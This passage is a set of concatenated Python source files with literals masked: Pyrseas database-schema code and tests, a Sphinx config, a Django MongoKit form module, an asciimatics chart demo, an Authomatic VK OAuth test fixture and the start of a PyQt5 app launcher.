) <EOL> stmts . append ( self . diff_description ( intable ) ) <EOL> return stmts <EOL> class ForeignTableDict ( ClassDict ) : <EOL> "<STR_LIT>" <EOL> cls = ForeignTable <EOL> query = """<STR_LIT>""" <EOL> def _from_catalog ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . dbconn . version < <NUM_LIT> : <EOL> return <EOL> for tbl in self . fetch ( ) : <EOL> self [ tbl . key ( ) ] = tbl <EOL> def from_map ( self , schema , inobjs , newdb ) : <EOL> """<STR_LIT>""" <EOL> for key in inobjs : <EOL> if not key . startswith ( '<STR_LIT>' ) : <EOL> raise KeyError ( "<STR_LIT>" % key ) <EOL> ftb = key [ <NUM_LIT> : ] <EOL> self [ ( schema . name , ftb ) ] = ftable = ForeignTable ( <EOL> schema = schema . name , name = ftb ) <EOL> inftable = inobjs [ key ] <EOL> if not inftable : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ftb ) <EOL> try : <EOL> newdb . columns . from_map ( ftable , inftable [ '<STR_LIT>' ] ) <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" % ftb , ) <EOL> raise <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' ] : <EOL> if attr in inftable : <EOL> setattr ( ftable , attr , inftable [ attr ] ) <EOL> if '<STR_LIT>' in inftable : <EOL> ftable . privileges = privileges_from_map ( <EOL> inftable [ '<STR_LIT>' ] , ftable . allprivs , ftable . owner ) <EOL> def link_refs ( self , dbcolumns ) : <EOL> """<STR_LIT>""" <EOL> for ( sch , tbl ) in dbcolumns : <EOL> if ( sch , tbl ) in self : <EOL> assert isinstance ( self [ ( sch , tbl ) ] , ForeignTable ) <EOL> self [ ( sch , tbl ) ] . columns = dbcolumns [ ( sch , tbl ) ] <EOL> for col in dbcolumns [ ( sch , tbl ) ] : <EOL> col . _table = self [ ( sch , tbl ) ] <EOL> def diff_map ( self , intables ) : <EOL> """<STR_LIT>""" <EOL> stmts = [ ] <EOL> for ( sch , tbl ) in intables : <EOL> intbl = intables [ ( sch , tbl ) ] <EOL> if ( sch , tbl ) not in self : <EOL> if hasattr ( intbl , '<STR_LIT>' ) : <EOL> oldname = intbl . oldname <EOL> try : <EOL> stmts . append ( self [ ( sch , oldname ) ] . rename ( intbl . name ) ) <EOL> del self [ ( sch , oldname ) ] <EOL> except KeyError as exc : <EOL> exc . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( oldname , intbl . name ) , ) <EOL> raise <EOL> else : <EOL> stmts . append ( intbl . create ( ) ) <EOL> for ( sch , tbl ) in self : <EOL> table = self [ ( sch , tbl ) ] <EOL> if ( sch , tbl ) not in intables : <EOL> stmts . append ( table . drop ( ) ) <EOL> else : <EOL> stmts . append ( table . diff_map ( intables [ ( sch , tbl ) ] ) ) <EOL> return stmts </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from pyrseas . testutils import DatabaseToMapTestCase <EOL> from pyrseas . testutils import InputMapToSqlTestCase , fix_indent <EOL> CREATE_COMPOSITE_STMT = "<STR_LIT>" <EOL> CREATE_ENUM_STMT = "<STR_LIT>" <EOL> CREATE_SHELL_STMT = "<STR_LIT>" <EOL> CREATE_FUNC_IN = "<STR_LIT>" "<STR_LIT>" <EOL> CREATE_FUNC_OUT = "<STR_LIT>" "<STR_LIT>" <EOL> CREATE_TYPE_STMT = "<STR_LIT>" <EOL> DROP_STMT = "<STR_LIT>" <EOL> COMMENT_STMT = "<STR_LIT>" <EOL> class CompositeToMapTestCase ( DatabaseToMapTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_composite ( self ) : <EOL> "<STR_LIT>" <EOL> dbmap = self . to_map ( [ CREATE_COMPOSITE_STMT ] ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } <EOL> def test_dropped_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> stmts = [ CREATE_COMPOSITE_STMT , "<STR_LIT>" ] <EOL> dbmap = self . to_map ( stmts ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } <EOL> class CompositeToSqlTestCase ( InputMapToSqlTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_create_composite ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == CREATE_COMPOSITE_STMT <EOL> def test_drop_composite ( self ) : <EOL> "<STR_LIT>" <EOL> sql = self . to_sql ( self . std_map ( ) , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> def test_rename_composite ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> def test_add_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:y>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ "<STR_LIT>" ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> def test_drop_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> def test_drop_attribute_schema ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap . update ( { '<STR_LIT>' : { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } } ) <EOL> sql = self . to_sql ( inmap , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> def test_rename_attribute ( self ) : <EOL> "<STR_LIT>" <EOL> if self . db . version < <NUM_LIT> : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ { '<STR_LIT:x>' : { '<STR_LIT:type>' : '<STR_LIT>' } } , <EOL> { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:y>' } } , <EOL> { '<STR_LIT:z>' : { '<STR_LIT:type>' : '<STR_LIT>' } } ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_COMPOSITE_STMT ] ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == "<STR_LIT>" <EOL> class EnumToMapTestCase ( DatabaseToMapTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_enum ( self ) : <EOL> "<STR_LIT>" <EOL> dbmap = self . to_map ( [ CREATE_ENUM_STMT ] ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } <EOL> class EnumToSqlTestCase ( InputMapToSqlTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_create_enum ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> sql = self . to_sql ( inmap ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == CREATE_ENUM_STMT <EOL> def test_drop_enum ( self ) : <EOL> "<STR_LIT>" <EOL> sql = self . to_sql ( self . std_map ( ) , [ CREATE_ENUM_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> def test_rename_enum ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } ) <EOL> sql = self . to_sql ( inmap , [ CREATE_ENUM_STMT ] ) <EOL> assert sql == [ "<STR_LIT>" ] <EOL> class BaseTypeToMapTestCase ( DatabaseToMapTestCase ) : <EOL> """<STR_LIT>""" <EOL> superuser = True <EOL> def test_base_type ( self ) : <EOL> "<STR_LIT>" <EOL> stmts = [ CREATE_SHELL_STMT , CREATE_FUNC_IN , CREATE_FUNC_OUT , <EOL> CREATE_TYPE_STMT ] <EOL> dbmap = self . to_map ( stmts ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT:input>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def test_base_type_category ( self ) : <EOL> "<STR_LIT>" <EOL> stmts = [ CREATE_SHELL_STMT , CREATE_FUNC_IN , CREATE_FUNC_OUT , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] <EOL> dbmap = self . to_map ( stmts ) <EOL> assert dbmap [ '<STR_LIT>' ] [ '<STR_LIT>' ] == { <EOL> '<STR_LIT:input>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:S>' } <EOL> class BaseTypeToSqlTestCase ( InputMapToSqlTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_create_base_type ( self ) : <EOL> "<STR_LIT>" <EOL> inmap = self . std_map ( ) <EOL> inmap [ '<STR_LIT>' ] . update ( { '<STR_LIT>' : { <EOL> '<STR_LIT:input>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:strict>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:source>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:strict>' : True , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' } } ) <EOL> sql = self . to_sql ( inmap ) <EOL> assert fix_indent ( sql [ <NUM_LIT:0> ] ) == CREATE_SHELL_STMT <EOL> assert fix_indent ( sql [ <NUM_LIT:1> ] ) == CREATE_FUNC_IN <EOL> assert fix_indent ( sql [ <NUM_LIT:2> ] ) == CREATE_FUNC_OUT <EOL> assert fix_indent ( sql [ <NUM_LIT:3> ] ) == "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> def test_drop_type ( self ) : <EOL> "<STR_LIT>" <EOL> stmts = [ CREATE_SHELL_STMT , CREATE_FUNC_IN , CREATE_FUNC_OUT , <EOL> CREATE_TYPE_STMT ] <EOL> sql = self . to_sql ( self . std_map ( ) , stmts , superuser = True ) <EOL> assert sql == [ "<STR_LIT>" ] </s>
<s> import sys , os <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import datetime <EOL> from django import forms <EOL> import json <EOL> from django . utils . datastructures import SortedDict <EOL> from django . forms . util import ErrorList <EOL> from django . forms . forms import BaseForm , get_declared_fields <EOL> from fields import JsonField , JsonListField <EOL> def save_instance ( form , instance , fields = None , fail_message = '<STR_LIT>' , <EOL> commit = True , exclude = None ) : <EOL> if form . errors : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( '<STR_LIT:object>' , fail_message ) ) <EOL> cleaned_data = form . cleaned_data <EOL> for field_name , field_type in instance . structure . items ( ) : <EOL> if fields and field_name not in fields : <EOL> continue <EOL> if exclude and field_name in exclude : <EOL> continue <EOL> instance [ field_name ] = cleaned_data [ field_name ] <EOL> if commit : <EOL> instance . save ( validate = True ) <EOL> return instance <EOL> def get_field_type_from_document ( instance , field_name ) : <EOL> field_type = instance . structure [ field_name ] <EOL> if isinstance ( field_type , list ) : <EOL> field_type = list <EOL> if isinstance ( field_type , dict ) : <EOL> field_type = dict <EOL> return field_type <EOL> def value_from_document ( instance , field_name ) : <EOL> field_type = get_field_type_from_document ( instance , field_name ) <EOL> if field_type in [ list , dict ] : <EOL> return json . dumps ( instance [ field_name ] ) <EOL> return instance [ field_name ] <EOL> def document_to_dict ( instance , fields = None , exclude = None ) : <EOL> """<STR_LIT>""" <EOL> structure = instance . structure <EOL> data = { } <EOL> for field_name in structure . keys ( ) : <EOL> if fields and not field_name in fields : <EOL> continue <EOL> if exclude and field_name in exclude : <EOL> continue <EOL> data [ field_name ] = value_from_document ( instance , field_name ) <EOL> return data <EOL> def get_default_form_field_types ( document , field_name , field_type ) : <EOL> default_form_field_types = { <EOL> bool : forms . BooleanField , <EOL> int : forms . IntegerField , <EOL> float : forms . FloatField , <EOL> str : forms . CharField , <EOL> unicode : forms . CharField , <EOL> datetime . datetime : forms . DateTimeField , <EOL> datetime . date : forms . DateField , <EOL> datetime . time : forms . TimeField , <EOL> list : JsonListField , <EOL> dict : JsonField , <EOL> } <EOL> return default_form_field_types [ field_type ] <EOL> def formfield_for_document_field ( document , field_name , <EOL> form_class = forms . CharField , <EOL> ** kwargs ) : <EOL> field_type = get_field_type_from_document ( document , field_name ) <EOL> FormField = get_default_form_field_types ( document , field_name , field_type ) <EOL> defaults = { <EOL> '<STR_LIT>' : field_name in document . required_fields , <EOL> } <EOL> if field_type == list : <EOL> defaults [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if field_type == dict : <EOL> defaults [ '<STR_LIT>' ] = '<STR_LIT:{}>' <EOL> if field_name in document . default_values : <EOL> default_value = document . default_values [ field_name ] <EOL> if callable ( default_value ) : <EOL> default_value = default_value ( ) <EOL> defaults [ '<STR_LIT>' ] = default_value <EOL> defaults . update ( kwargs ) <EOL> formfield = FormField ( ** defaults ) <EOL> return formfield <EOL> def fields_for_document ( document , fields = None , exclude = None , <EOL> formfield_callback = None ) : <EOL> """<STR_LIT>""" <EOL> field_list = [ ] <EOL> structure = document . structure <EOL> for field_name , field_type in structure . items ( ) : <EOL> if fields and not field_name in fields : <EOL> continue <EOL> if exclude and field_name in exclude : <EOL> continue <EOL> form_field = None <EOL> if formfield_callback : <EOL> form_field = formfield_callback ( document , field_name ) <EOL> if not form_field : <EOL> form_field = formfield_for_document_field ( document , field_name ) <EOL> if form_field : <EOL> field_list . append ( ( field_name , form_field ) ) <EOL> field_dict = SortedDict ( field_list ) <EOL> if fields : <EOL> field_dict = SortedDict ( [ ( f , field_dict . get ( f ) ) <EOL> for f in fields <EOL> if ( not exclude ) or ( exclude and f not in exclude ) ] ) <EOL> return field_dict <EOL> class DocumentFormOptions ( object ) : <EOL> def __init__ ( self , options = None ) : <EOL> try : <EOL> self . document = getattr ( options , '<STR_LIT>' ) <EOL> except AttributeError : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> try : <EOL> self . document . collection <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self . fields = getattr ( options , '<STR_LIT>' , None ) <EOL> self . exclude = getattr ( options , '<STR_LIT>' , None ) <EOL> class DocumentFormMetaclass ( type ) : <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> formfield_callback = attrs . pop ( '<STR_LIT>' , None ) <EOL> try : <EOL> parents = [ b for b in bases if issubclass ( b , DocumentForm ) ] <EOL> except NameError : <EOL> parents = None <EOL> declared_fields = get_declared_fields ( bases , attrs , False ) <EOL> new_class = super ( DocumentFormMetaclass , cls ) . __new__ ( cls , name , bases , <EOL> attrs ) <EOL> if not parents : <EOL> return new_class <EOL> opts = new_class . _meta = DocumentFormOptions ( <EOL> getattr ( new_class , '<STR_LIT:Meta>' , None ) <EOL> ) <EOL> if opts . document : <EOL> fields = fields_for_document ( opts . document , opts . fields , <EOL> opts . exclude , formfield_callback ) <EOL> fields . update ( declared_fields ) <EOL> else : <EOL> fields = declared_fields <EOL> new_class . declared_fields = declared_fields <EOL> new_class . base_fields = fields <EOL> return new_class <EOL> class BaseDocumentForm ( BaseForm ) : <EOL> def __init__ ( self , data = None , files = None , auto_id = '<STR_LIT>' , prefix = None , <EOL> initial = None , error_class = ErrorList , label_suffix = '<STR_LIT::>' , <EOL> empty_permitted = False , instance = None , <EOL> collection = None ) : <EOL> opts = self . _meta <EOL> if instance is None : <EOL> if collection is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . instance = opts . document ( collection = collection ) <EOL> object_data = { } <EOL> else : <EOL> self . instance = instance <EOL> try : <EOL> self . instance . collection <EOL> except AttributeError : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> object_data = document_to_dict ( instance , opts . fields , opts . exclude ) <EOL> if initial is not None : <EOL> object_data . update ( initial ) <EOL> super ( BaseDocumentForm , self ) . __init__ ( <EOL> data , files , auto_id , prefix , object_data , <EOL> error_class , label_suffix , empty_permitted <EOL> ) <EOL> def save ( self , commit = True ) : <EOL> if self . instance . get ( '<STR_LIT>' , None ) is None : <EOL> fail_message = '<STR_LIT>' <EOL> else : <EOL> fail_message = '<STR_LIT>' <EOL> return save_instance ( self , self . instance , self . _meta . fields , <EOL> fail_message , commit , exclude = self . _meta . exclude ) <EOL> save . alters_data = True <EOL> class DocumentForm ( BaseDocumentForm ) : <EOL> __metaclass__ = DocumentFormMetaclass <EOL> def documentform_factory ( document , form = DocumentForm , <EOL> fields = None , exclude = None , <EOL> formfield_callback = None ) : <EOL> try : <EOL> document . collection <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> attrs = { '<STR_LIT>' : document } <EOL> if fields is not None : <EOL> attrs [ '<STR_LIT>' ] = fields <EOL> if exclude is not None : <EOL> attrs [ '<STR_LIT>' ] = exclude <EOL> parent = ( object , ) <EOL> if hasattr ( form , '<STR_LIT:Meta>' ) : <EOL> parent = ( form . Meta , object ) <EOL> Meta = type ( '<STR_LIT:Meta>' , parent , attrs ) <EOL> class_name = '<STR_LIT>' % document . __name__ <EOL> form_class_attrs = { <EOL> '<STR_LIT:Meta>' : Meta , <EOL> '<STR_LIT>' : formfield_callback <EOL> } <EOL> return DocumentFormMetaclass ( class_name , ( form , ) , form_class_attrs ) </s>
<s> from django . conf . urls import patterns , include , url <EOL> from . import views <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . home , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> __author__ = '<STR_LIT>' </s>
<s> from asciimatics . renderers import BarChart <EOL> from asciimatics . screen import Screen <EOL> import sys <EOL> import math <EOL> import time <EOL> from random import randint <EOL> def fn ( ) : <EOL> return randint ( <NUM_LIT:0> , <NUM_LIT> ) <EOL> def wv ( x ) : <EOL> return lambda : <NUM_LIT:1> + math . sin ( math . pi * ( <NUM_LIT:2> * time . time ( ) + x ) / <NUM_LIT:5> ) <EOL> def demo ( ) : <EOL> chart = BarChart ( <NUM_LIT:10> , <NUM_LIT> , [ fn , fn ] , <EOL> char = "<STR_LIT:=>" , <EOL> gradient = [ ( <NUM_LIT:20> , Screen . COLOUR_GREEN ) , <EOL> ( <NUM_LIT:30> , Screen . COLOUR_YELLOW ) , <EOL> ( <NUM_LIT> , Screen . COLOUR_RED ) ] ) <EOL> print ( chart ) <EOL> chart = BarChart ( <NUM_LIT> , <NUM_LIT> , <EOL> [ wv ( <NUM_LIT:1> ) , wv ( <NUM_LIT:2> ) , wv ( <NUM_LIT:3> ) , wv ( <NUM_LIT:4> ) , wv ( <NUM_LIT:5> ) , wv ( <NUM_LIT:7> ) , wv ( <NUM_LIT:8> ) , wv ( <NUM_LIT:9> ) ] , <EOL> colour = Screen . COLOUR_GREEN , <EOL> axes = BarChart . BOTH , <EOL> scale = <NUM_LIT> ) <EOL> print ( chart ) <EOL> chart = BarChart ( <NUM_LIT:7> , <NUM_LIT> , [ lambda : time . time ( ) * <NUM_LIT:10> % <NUM_LIT> ] , <EOL> gradient = [ ( <NUM_LIT:10> , <NUM_LIT> ) , ( <NUM_LIT:20> , <NUM_LIT> ) , ( <NUM_LIT:30> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:50> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:100> , <NUM_LIT> ) ] , <EOL> char = "<STR_LIT:>>" , <EOL> scale = <NUM_LIT> , <EOL> labels = True , <EOL> axes = BarChart . X_AXIS ) <EOL> print ( chart ) <EOL> chart = BarChart ( <NUM_LIT:10> , <NUM_LIT> , <EOL> [ wv ( <NUM_LIT:1> ) , wv ( <NUM_LIT:2> ) , wv ( <NUM_LIT:3> ) , wv ( <NUM_LIT:4> ) , wv ( <NUM_LIT:5> ) , wv ( <NUM_LIT:7> ) , wv ( <NUM_LIT:8> ) , wv ( <NUM_LIT:9> ) ] , <EOL> colour = [ c for c in range ( <NUM_LIT:1> , <NUM_LIT:8> ) ] , <EOL> scale = <NUM_LIT> , <EOL> axes = BarChart . X_AXIS , <EOL> intervals = <NUM_LIT:0.5> , <EOL> labels = True , <EOL> border = False ) <EOL> print ( chart ) <EOL> demo ( ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> import datetime <EOL> import re <EOL> import fixtures <EOL> import constants <EOL> from authomatic . providers import oauth2 <EOL> conf = fixtures . get_configuration ( '<STR_LIT>' ) <EOL> PICTURE = re . compile ( r'<STR_LIT>' ) <EOL> CONFIG = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : oauth2 . VK , <EOL> '<STR_LIT>' : oauth2 . VK . user_info_scope , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:user>' : { <EOL> '<STR_LIT>' : conf . user_birth_date_str , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:email>' : None , <EOL> '<STR_LIT>' : conf . user_first_name , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:id>' : conf . user_id , <EOL> '<STR_LIT>' : conf . user_last_name , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:location>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:name>' : conf . user_name , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : PICTURE , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : re . compile ( '<STR_LIT>' ) , <EOL> '<STR_LIT:username>' : None , <EOL> } , <EOL> '<STR_LIT>' : [ <EOL> conf . user_birth_date . strftime ( '<STR_LIT>' ) , <EOL> conf . user_first_name , <EOL> conf . user_id , <EOL> conf . user_last_name , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : <EOL> conf . no_email + <EOL> conf . no_locale + <EOL> conf . no_phone + <EOL> conf . no_postal_code + <EOL> conf . no_username + <EOL> [ '<STR_LIT>' , conf . user_nickname ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : constants . CREDENTIALS_REFRESH_NOT_SUPPORTED , <EOL> } , <EOL> } </s>
<s> import sys <EOL> from PyQt5 . QtWidgets import QApplication <EOL> from models . cache import CACHE <EOL> from models . app import CoubletAppModel <EOL> from models . com import set_user_agent <EOL> from presenters . window import CoubletWindowPresenter <EOL> from views . vars import set_gui_constants , DEFAULT_WINDOW_POS_DIM <EOL> VERSION = <NUM_LIT:0> , <NUM_LIT:6> , <NUM_LIT> <EOL> DEV = <NUM_LIT:0> <EOL> class CoubletApp ( QApplication ) : <EOL> NAME = '<STR_LIT>' <EOL> def __init__ ( self , version , * args , ** kwargs ) : <EOL> super ( ) . __init__ ( sys . argv , * args , ** kwargs ) <EOL> self . setApplicationName ( self . NAME ) <EOL> set_gui_constants ( self ) <EOL> set_user_agent ( self . NAME , version ) <EOL> CACHE . load ( version , DEFAULT_WINDOW_POS_DIM ) <EOL> self . _model = CoubletAppModel ( ) <EOL> self . _presenter = CoubletWindowPresenter ( self . _model , self . NAME ) <EOL> self . _presenter . set_auto_save ( CACHE . auto_save ) <EOL> def run ( self ) : <EOL> self . _presenter . show_view ( ) <EOL> return self . exec_ ( ) <EOL> if __name__ == 